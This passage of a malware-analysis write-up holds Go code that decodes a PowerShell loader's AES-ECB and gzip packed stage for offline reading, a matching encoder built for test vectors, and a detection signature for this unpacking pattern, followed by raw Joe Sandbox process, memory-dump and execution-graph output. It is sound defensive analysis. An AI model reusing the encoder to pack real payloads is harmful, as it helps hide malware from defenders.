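// ecbCrypt runs the block permutation over each 16-byte block independently;
// ECB has no chaining, which is why the loader can assign an IV it never uses.
func ecbCrypt(key, data []byte, decrypt bool) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil || len(data)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("bad key or data length %d not a multiple of 16: %v", len(data), err)
	}
	out := make([]byte, len(data))
	for i := 0; i < len(data); i += aes.BlockSize {
		if decrypt {
			block.Decrypt(out[i:i+aes.BlockSize], data[i:i+aes.BlockSize])
		} else {
			block.Encrypt(out[i:i+aes.BlockSize], data[i:i+aes.BlockSize])
		}
	}
	return out, nil
}

// DecodeStage replays the loader offline:
// base64 -> drop 16-byte prefix -> AES-256-ECB -> gunzip -> UTF-8 script text.
func DecodeStage(payloadB64, keyB64 string) (string, error) {
	key, err := base64.StdEncoding.DecodeString(keyB64)
	if err != nil || len(key) != 32 {
		return "", fmt.Errorf("key must decode to 32 bytes (KeySize = 256): %v", err)
	}
	blob, err := base64.StdEncoding.DecodeString(payloadB64)
	if err != nil || len(blob) <= aes.BlockSize {
		return "", fmt.Errorf("payload must be base64 longer than the 16-byte IV prefix: %v", err)
	}
	// Mirrors TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16).
	plain, err := ecbCrypt(key, blob[aes.BlockSize:], true)
	if err != nil {
		return "", err
	}
	// PaddingMode.Zeros leaves trailing 0x00 bytes after the gzip member;
	// Multistream(false) stops after that member instead of failing on them.
	zr, err := gzip.NewReader(bytes.NewReader(plain))
	if err != nil {
		return "", fmt.Errorf("gzip header: %w", err)
	}
	zr.Multistream(false)
	script, err := io.ReadAll(zr)
	if err != nil {
		return "", fmt.Errorf("gunzip: %w", err)
	}
	return string(script), nil
}

// EncodeStage is the inverse chain (gzip, zero-pad to 16 bytes, AES-256-ECB, prepend a
// throwaway IV). The report shows no encoder; this is the editor's reconstruction
// from the decrypt parameters and exists only to build test vectors.
func EncodeStage(script, keyB64 string, iv [aes.BlockSize]byte) (string, error) {
	key, err := base64.StdEncoding.DecodeString(keyB64)
	if err != nil {
		return "", err
	}
	var gz bytes.Buffer
	zw := gzip.NewWriter(&gz)
	if _, err := zw.Write([]byte(script)); err != nil {
		return "", err
	}
	if err := zw.Close(); err != nil {
		return "", err
	}
	data := gz.Bytes()
	if rem := len(data) % aes.BlockSize; rem != 0 {
		data = append(data, make([]byte, aes.BlockSize-rem)...)
	}
	ct, err := ecbCrypt(key, data, false)
	if err != nil {
		return "", err
	}
	return base64.StdEncoding.EncodeToString(append(iv[:], ct...)), nil
}

// Paste the $fNaPOP value from the report on stdin; the recovered stage-2
// script goes to stdout for reading, never into another powershell.
func main() {
	raw, err := io.ReadAll(os.Stdin)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	script, err := DecodeStage(string(bytes.TrimSpace(raw)), stageKeyB64)
	if err != nil {
		fmt.Fprintln(os.Stderr, "decode failed:", err)
		os.Exit(1)
	}
	fmt.Print(script)
}
```

Save the blob from the report to a file and run the program (saved as, say, decode_stage.go, a name chosen here) with "go run decode_stage.go < fNaPOP.txt". Two details matter when porting the chain to another language: the 16-byte prefix must be skipped rather than handed to the cipher, and the trailing zero bytes left by PaddingMode.Zeros must not reach a gzip reader that expects a clean multi-member stream. For hunting, the combination of AesManaged, CipherMode]::ECB and GzipStream on one command line that ends in a bare variable, followed by a child "powershell -", is a reasonable signature for this unpacking pattern.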

                          Target ID:7
                          Start time:15:30:11
                          Start date:06/10/2023
                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Research.pdf"
                          Imagebase:0x7ff6e8200000
                          File size:5'641'176 bytes
                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:8
                          Start time:15:30:12
                          Start date:06/10/2023
                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                          Imagebase:0x7ff79c940000
                          File size:3'581'912 bytes
                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:9
                          Start time:15:30:12
                          Start date:06/10/2023
                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1564,i,7959819648417443592,3997577616809760479,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                          Imagebase:0x7ff79c940000
                          File size:3'581'912 bytes
                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:10
                          Start time:15:30:14
                          Start date:06/10/2023
                          Path:C:\Users\user\putty.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\putty.exe"
                          Imagebase:0x400000
                          File size:495'616 bytes
                          MD5 hash:7A0DFC5353FF6DE7DE0208A29FA2FFC9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 0%, ReversingLabs
                          • Detection: 2%, Virustotal
                          Reputation:moderate
                          Has exited:false

                            Memory Dump Source
                            • Source File: 00000001.00000002.1398402681.00000000046D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_46d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 58fdccd0a8a7b17f69a00bde4cea6cd7fb00a4ca9c854c7c72e52cb94a9968ce
                            • Instruction ID: dde1f406d5ca1725b67e232cbd8d0bd6ec62bb4a717f7ccf753d37b2d6e704ad
                            • Opcode Fuzzy Hash: 58fdccd0a8a7b17f69a00bde4cea6cd7fb00a4ca9c854c7c72e52cb94a9968ce
                            • Instruction Fuzzy Hash: AD513874B003188FDB24DF68C850B9DBBB2BF89700F1181A9D9459B395EB71AD82CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.1398402681.00000000046D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_46d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 62cc9a3c96da944d4348d39d482d8c4af854edf385f4e1d7e50a0ddf22619935
                            • Instruction ID: cbfc01972641d4cea949250d34b926885e6dbfd380287b20aaf63c042f10971e
                            • Opcode Fuzzy Hash: 62cc9a3c96da944d4348d39d482d8c4af854edf385f4e1d7e50a0ddf22619935
                            • Instruction Fuzzy Hash: F0315074E002099FDB14DFA8D851AFDBFB2EF89311F1081AAD515AB350EB356942CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.1398101243.0000000002F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F1D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2f1d000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 68f8ce4a35a9e9cadc61a76ae8ed97642f9d9e73fd8fa6e3b6e064e593138edb
                            • Instruction ID: 4d29577a98c0ad6f8971474e5c115039223eac48d3e27dee42516f4b9f975ab6
                            • Opcode Fuzzy Hash: 68f8ce4a35a9e9cadc61a76ae8ed97642f9d9e73fd8fa6e3b6e064e593138edb
                            • Instruction Fuzzy Hash: ED012B729043049FE7104B16CCC0B67BFE8DF41AA5F18C419DE480B186C3789445C7B1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.1398101243.0000000002F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F1D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2f1d000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ca63a8f19b864239605a1ed434debc381d8900f7897ec3bcc582a9271431de61
                            • Instruction ID: 9f065ee7cb48337c781b8f4aaaa82e79116e58552249bc0d4e394d155735ff7b
                            • Opcode Fuzzy Hash: ca63a8f19b864239605a1ed434debc381d8900f7897ec3bcc582a9271431de61
                            • Instruction Fuzzy Hash: 34015E7240E3C49FD7128B258894B52BFB4DF43664F1D80DBD9888F1A7C2695849C772
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.1398402681.00000000046D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_46d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2bc99c78ceb372c6b73e7bb5f0481c8c37c02cda264ba4a7df6f945018133ed0
                            • Instruction ID: 17f45e17f253043381ff0699abb6aff838c739334159c09e1086f0daa936132d
                            • Opcode Fuzzy Hash: 2bc99c78ceb372c6b73e7bb5f0481c8c37c02cda264ba4a7df6f945018133ed0
                            • Instruction Fuzzy Hash: EE016230B043289FDB54CB58C800F9ABBF5BF49710F0141D9E945AB391D7B2AD448F52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.1398402681.00000000046D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_46d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6f4541a773064aeababe52e70a6a918ce051ed5a55b8fa7e536b790c447f5ec9
                            • Instruction ID: 935d85c04df4c7ace2e9bc60fde83c0ca6f261c10eb9ffdfb42f9ef7bde7582f
                            • Opcode Fuzzy Hash: 6f4541a773064aeababe52e70a6a918ce051ed5a55b8fa7e536b790c447f5ec9
                            • Instruction Fuzzy Hash: 1BF0B735A001099FDB15CB98D890AEEF7B1FF88324F208199E515A72A1C736E852CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.1398402681.00000000046D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_46d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 414ba65d7f1702f2dc2911696fbe524424be7eb4cea99ef71aeb780401d5e2f8
                            • Instruction ID: 7cedb3260be02ef7a9dd92658a810c0baac2acaf2db55bcdbde71dce93173af4
                            • Opcode Fuzzy Hash: 414ba65d7f1702f2dc2911696fbe524424be7eb4cea99ef71aeb780401d5e2f8
                            • Instruction Fuzzy Hash: C7E026B4E0424E9F8F88EFB995411BEFBF5AB48201F10856F9919E3340F63456118F95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.1398402681.00000000046D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_46d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b6c8e73ba1521ae67f8c50cb795bc1d09959f9b2f09c2deb66d9f0ae9aab5dc8
                            • Instruction ID: 3749d764082478f9edae0e4966f3ddb712b58961dcf3d1e5f06fc7f1a2292848
                            • Opcode Fuzzy Hash: b6c8e73ba1521ae67f8c50cb795bc1d09959f9b2f09c2deb66d9f0ae9aab5dc8
                            • Instruction Fuzzy Hash: B6D05E2004D3C66EE72257F8240A2E0BF799F03309F4D00C7D18945453EA295899E3A7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: zn^$zn^
                            • API String ID: 0-1630707886
                            • Opcode ID: afbfc4ffc64435a85f3e69aecf08fbab2720721c391080acb709656ee53de29e
                            • Instruction ID: 839376b8ba52b66014791ffcf394d08db5741648be8fcc680fdced50865d427a
                            • Opcode Fuzzy Hash: afbfc4ffc64435a85f3e69aecf08fbab2720721c391080acb709656ee53de29e
                            • Instruction Fuzzy Hash: 14923A34A012589FDB05DFA8D494A9DFBB2FF89714F248659E804EB361C735ED82CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e0bc31bb99c2f7734e9b07f3d568778c203011ffd7739806f88431613e7e2b43
                            • Instruction ID: 2111fc1bfcd38e45be61e36c5f88c8f80271f708f8f48c194b1a0c4501360d98
                            • Opcode Fuzzy Hash: e0bc31bb99c2f7734e9b07f3d568778c203011ffd7739806f88431613e7e2b43
                            • Instruction Fuzzy Hash: 98025F34A05258AFDB05CFA8C894A9EBBB2FF89314F148559E805EB761C735ED81CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 58a4651708335af3a3dc46cfa5680433900a00853204a275c12c838300ff3357
                            • Instruction ID: deafe0c8b2d051f86607dc6b1142cfd2fcf6a06d88cfb3169b3f68bc0653cd76
                            • Opcode Fuzzy Hash: 58a4651708335af3a3dc46cfa5680433900a00853204a275c12c838300ff3357
                            • Instruction Fuzzy Hash: 3291822190E3D45FD703DB28DCB45EA7FB0AF87614B0946C7D480DF1A3D629A948C7A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4e603972b4ee177ec2bfd29f82d2fb11dd78779a8a32257e84c50773f1524cfa
                            • Instruction ID: 2b8a7c10aedaacd8325a87de77f18d973af72c6a5761e6eb881105ad017d4363
                            • Opcode Fuzzy Hash: 4e603972b4ee177ec2bfd29f82d2fb11dd78779a8a32257e84c50773f1524cfa
                            • Instruction Fuzzy Hash: 5B51E674A00219EFDB05CFA8D494A9DFBB2FF88314F248558E805AB765C775EC82CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 36aa1e8283a29f8f78314c379449d1ed98ce21d061b71beb75be1e2b1a3a6636
                            • Instruction ID: dde8228ccf532f00e4c4b85e0c6a546a2624a016ff0f613a420e1f8024db7edf
                            • Opcode Fuzzy Hash: 36aa1e8283a29f8f78314c379449d1ed98ce21d061b71beb75be1e2b1a3a6636
                            • Instruction Fuzzy Hash: 0D416D74A002449FCB14CF5CC8949AEBBB1EF89310B248A59E915EB7A5C336FC41CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aced161602182ae889e37b5980038b5223f7b85c5cc6fab1032a897f4f60d231
                            • Instruction ID: c28f576a685cffe1c19041391c6bbff005fa6a35fb256c8850bb55ffb39656ca
                            • Opcode Fuzzy Hash: aced161602182ae889e37b5980038b5223f7b85c5cc6fab1032a897f4f60d231
                            • Instruction Fuzzy Hash: 73315E75A042499FCB05DF5CC8949AAFBB1FF89310B15859AD845EB362C731FC41CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3d55c4a38d201904f290acbb4f1105cc3598a1fe39de64b8f3c846d5d5fe4f95
                            • Instruction ID: 0522af1edc311940c9240eadc2d23b1b5d1b98c66525a9affb1315b05803a6e2
                            • Opcode Fuzzy Hash: 3d55c4a38d201904f290acbb4f1105cc3598a1fe39de64b8f3c846d5d5fe4f95
                            • Instruction Fuzzy Hash: 29213B75A002099FCB04DF59C8909AAFBB1FF89310B158995E819EB351C735FC41DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 93a9227e0ab7c035f72153935ac29f854c7b70a29017bbb503b5a283302a1e53
                            • Instruction ID: 3b7e12920d4d0868f775e87444745a02d7514134a4ce7e640c09b6f379a3c70e
                            • Opcode Fuzzy Hash: 93a9227e0ab7c035f72153935ac29f854c7b70a29017bbb503b5a283302a1e53
                            • Instruction Fuzzy Hash: 1A212C75A002098FCB04CF58C494AA9FBB1FF88310B158999D956EB361C735FC41DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 02b5b65fbc522003823e0a8e98e1532560e2f75b49e97a565223fc78678de4eb
                            • Instruction ID: 68b7226f8f113a61d6027a1729c0895152abce4603e2a1bcfcf6d4cf0c1d6640
                            • Opcode Fuzzy Hash: 02b5b65fbc522003823e0a8e98e1532560e2f75b49e97a565223fc78678de4eb
                            • Instruction Fuzzy Hash: 3C21E474A006199FCB04CF89C8909AAF7B1FF89310B258669E909E7751C735FC51CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000005.00000002.1410052268.0000000004870000.00000040.00000800.00020000.00000000.sdmp, Offset: 04870000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_4870000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f3d1b88c7b3bace396a6bde9f49568166e0f57a48fe01ed4a12ce2e77a9fe9bf
                            • Instruction ID: 0879c824f2da459f3abe26816f45380c0818720b5a27eccc8d008441fe0d2368
                            • Opcode Fuzzy Hash: f3d1b88c7b3bace396a6bde9f49568166e0f57a48fe01ed4a12ce2e77a9fe9bf
                            • Instruction Fuzzy Hash: 6211DA34A00219EFDB05CFA8D494E9DBBB2FF89314F288558E404AB761C775E982CF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:4.9%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0.5%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:54
                            execution_graph: node/edge listing of the interactive graph widget (entry node 44421e). Win32 APIs reached along the graphed paths: CreateDialogParamA, ShowWindow, SetActiveWindow, RegisterClipboardFormatA, GetModuleFileNameA, GetProcAddress, FreeLibrary, CoInitialize, MessageBoxA, MessageBoxIndirectA, MapViewOfFile, UnmapViewOfFile, RegOpenKeyA, RegEnumKeyA, RegQueryValueExA, RegCloseKey, LoadIconA, LoadCursorA, RegisterClassA, CreateWindowExA, GetWindowRect, GetClientRect, SetWindowPos, CreateBitmap, DeleteMenu, AppendMenuA, GetKeyboardLayout, GetLocaleInfoA, SetForegroundWindow, GetForegroundWindow, UpdateWindow, MsgWaitForMultipleObjects, PeekMessageA, IsWindow, IsDialogMessageA, DispatchMessageA, GetVersionExA, CreateFileA, GetFileType, SetStdHandle, SetFilePointer, GetLastError, CloseHandle.
56682->56683 56684 410000 56683->56684 56685 40e8a8 39 API calls 56684->56685 56686 410013 56685->56686 56687 402036 38 API calls 56686->56687 56688 41001b 56687->56688 56689 410073 56688->56689 56690 40e889 RegQueryValueExA 56688->56690 56691 40e7e9 40 API calls 56689->56691 56697 41002f 56690->56697 56692 410089 56691->56692 56693 40e8a8 39 API calls 56692->56693 56694 410099 56693->56694 56696 40e7e9 40 API calls 56694->56696 56695 40248b 38 API calls 56695->56689 56698 4100a8 56696->56698 56699 40e889 RegQueryValueExA 56697->56699 56701 410036 56697->56701 56700 40e7e9 40 API calls 56698->56700 56699->56701 56702 4100b7 56700->56702 56701->56695 56703 40e7e9 40 API calls 56702->56703 56704 4100cd 56703->56704 56705 40e8ca 40 API calls 56704->56705 56706 4100db 56705->56706 56707 40e7e9 40 API calls 56706->56707 56708 4100ea 56707->56708 56709 40e8a8 39 API calls 56708->56709 56710 4100f9 56709->56710 56711 40e7e9 40 API calls 56710->56711 56712 41010b 56711->56712 56713 40e8a8 39 API calls 56712->56713 56714 41011a 56713->56714 56715 40e8a8 39 API calls 56714->56715 56716 410129 56715->56716 56717 40e8a8 39 API calls 56716->56717 56718 410139 56717->56718 56719 40e8a8 39 API calls 56718->56719 56720 41014b 56719->56720 56721 40e8a8 39 API calls 56720->56721 56722 41015a 56721->56722 56723 40e8a8 39 API calls 56722->56723 56724 410169 56723->56724 57063 40eb57 56724->57063 56727 40e889 RegQueryValueExA 56728 410192 56727->56728 56729 40eb57 40 API calls 56728->56729 56730 4101bc 56729->56730 56731 40e8a8 39 API calls 56730->56731 56732 4101cc 56731->56732 56733 40e7e9 40 API calls 56732->56733 56734 4101df 56733->56734 56735 40e8a8 39 API calls 56734->56735 56736 4101f2 56735->56736 56737 40e7e9 40 API calls 56736->56737 56738 410201 56737->56738 56739 40e8a8 39 API calls 56738->56739 56740 410210 56739->56740 56741 40e8a8 39 API calls 56740->56741 56742 41021f 56741->56742 56743 40e8a8 39 API calls 56742->56743 56744 410232 56743->56744 56745 40e8a8 39 API 
calls 56744->56745 56746 410241 56745->56746 56747 40e8a8 39 API calls 56746->56747 56748 410251 56747->56748 56749 40e8a8 39 API calls 56748->56749 56750 410261 56749->56750 56751 40eb57 40 API calls 56750->56751 56752 410282 56751->56752 56753 40e84f 40 API calls 56752->56753 56754 410290 56753->56754 56755 40e8a8 39 API calls 56754->56755 56756 41029f 56755->56756 56757 40e84f 40 API calls 56756->56757 56758 4102b0 56757->56758 56759 40e7e9 40 API calls 56758->56759 56760 4102bf 56759->56760 56761 40e8a8 39 API calls 56760->56761 56762 4102ce 56761->56762 56763 40e8a8 39 API calls 56762->56763 56764 4102dd 56763->56764 56765 40e8a8 39 API calls 56764->56765 56766 4102f0 56765->56766 56767 40e8a8 39 API calls 56766->56767 56768 4102ff 56767->56768 56769 40e8a8 39 API calls 56768->56769 56770 41030e 56769->56770 56771 40e8a8 39 API calls 56770->56771 56772 41031d 56771->56772 56773 40e8a8 39 API calls 56772->56773 56774 41032f 56773->56774 56775 40e8a8 39 API calls 56774->56775 56776 41033e 56775->56776 56777 40e8a8 39 API calls 56776->56777 56778 41034d 56777->56778 56779 40e8a8 39 API calls 56778->56779 56780 41035c 56779->56780 56781 40e8a8 39 API calls 56780->56781 56782 41036e 56781->56782 56783 40e889 RegQueryValueExA 56782->56783 56784 41037b 56783->56784 56785 40e8a8 39 API calls 56784->56785 56786 410392 56785->56786 56787 40e8a8 39 API calls 56786->56787 56788 4103a1 56787->56788 56789 40e8a8 39 API calls 56788->56789 56790 4103b3 56789->56790 56791 40e8a8 39 API calls 56790->56791 56792 4103c2 56791->56792 56793 40e8a8 39 API calls 56792->56793 56794 4103d1 56793->56794 56795 40e8a8 39 API calls 56794->56795 56796 4103e0 56795->56796 56797 40e8a8 39 API calls 56796->56797 56798 4103f3 56797->56798 56799 40e8a8 39 API calls 56798->56799 56800 410402 56799->56800 56801 40e8a8 39 API calls 56800->56801 56802 410411 56801->56802 56803 40e8a8 39 API calls 56802->56803 56804 410420 56803->56804 56805 40e8a8 39 API calls 56804->56805 56806 410433 56805->56806 
56807 40e8a8 39 API calls 56806->56807 56808 410442 56807->56808 56809 40e8a8 39 API calls 56808->56809 56810 410452 56809->56810 56811 40e8a8 39 API calls 56810->56811 56812 410462 56811->56812 56813 40e8a8 39 API calls 56812->56813 56814 410475 56813->56814 56815 40e7e9 40 API calls 56814->56815 56816 410488 56815->56816 56817 40e8a8 39 API calls 56816->56817 56818 410497 56817->56818 56819 40e8a8 39 API calls 56818->56819 56820 4104a6 56819->56820 56821 40e8a8 39 API calls 56820->56821 56822 4104b8 56821->56822 56823 40e8a8 39 API calls 56822->56823 56824 4104c7 56823->56824 56825 40e8a8 39 API calls 56824->56825 56826 4104d7 56825->56826 56827 40e8a8 39 API calls 56826->56827 56828 4104e6 56827->56828 56829 40e8a8 39 API calls 56828->56829 56830 4104f8 56829->56830 56831 40e8a8 39 API calls 56830->56831 56832 410508 56831->56832 56833 40e8a8 39 API calls 56832->56833 56834 410517 56833->56834 56835 40e84f 40 API calls 56834->56835 56836 410525 56835->56836 56837 40e8a8 39 API calls 56836->56837 56838 410538 56837->56838 56839 40e8a8 39 API calls 56838->56839 56840 410548 56839->56840 56841 40e889 RegQueryValueExA 56840->56841 56842 410558 56841->56842 56843 40248b 38 API calls 56842->56843 56844 410561 56843->56844 56845 40e889 RegQueryValueExA 56844->56845 56846 410574 56845->56846 56847 40248b 38 API calls 56846->56847 56848 41057d 56847->56848 56849 40e8a8 39 API calls 56848->56849 56850 410590 56849->56850 56851 40e8a8 39 API calls 56850->56851 56852 41059f 56851->56852 56853 40e8a8 39 API calls 56852->56853 56854 4105b2 56853->56854 56855 40e8a8 39 API calls 56854->56855 56856 4105c1 56855->56856 56857 40e8a8 39 API calls 56856->56857 56858 4105d3 56857->56858 56859 40e8a8 39 API calls 56858->56859 56860 4105e2 56859->56860 56861 40e8a8 39 API calls 56860->56861 56862 4105f4 56861->56862 56863 40e8a8 39 API calls 56862->56863 56864 410604 56863->56864 56865 40e7e9 40 API calls 56864->56865 56866 410613 56865->56866 56867 40e8a8 39 API calls 56866->56867 
56868 410623 56867->56868 56869 40e8a8 39 API calls 56868->56869 56870 410636 56869->56870 57073 40e815 56870->57073 56872 410644 56873 40e8a8 39 API calls 56872->56873 56874 410653 56873->56874 56875 40e8a8 39 API calls 56874->56875 56876 410666 56875->56876 56877 40e8a8 39 API calls 56876->56877 56878 41067b 56877->56878 56879 40e8a8 39 API calls 56878->56879 56880 41068d 56879->56880 56881 40e8a8 39 API calls 56880->56881 56882 41069d 56881->56882 56883 40e8a8 39 API calls 56882->56883 56884 4106b0 56883->56884 56885 40e889 RegQueryValueExA 56884->56885 56886 4106bf 56885->56886 56887 40248b 38 API calls 56886->56887 56891 4106cc 56887->56891 56888 44cd68 32 API calls 56888->56891 56889 40e7b4 2 API calls 56889->56891 56890 44e48e 46 API calls 56890->56891 56891->56888 56891->56889 56891->56890 56892 4024f4 38 API calls 56891->56892 56893 41078a 56891->56893 56892->56891 56894 40e8a8 39 API calls 56893->56894 56895 41079c 56894->56895 56896 40e8a8 39 API calls 56895->56896 56897 4107ae 56896->56897 56898 40e8a8 39 API calls 56897->56898 56899 4107c0 56898->56899 56900 40e8a8 39 API calls 56899->56900 56901 4107d2 56900->56901 56902 40e8a8 39 API calls 56901->56902 56909 4107e8 56902->56909 56903 44cd68 32 API calls 56903->56909 56904 40e7b4 2 API calls 56904->56909 56905 4108a4 56906 40e7e9 40 API calls 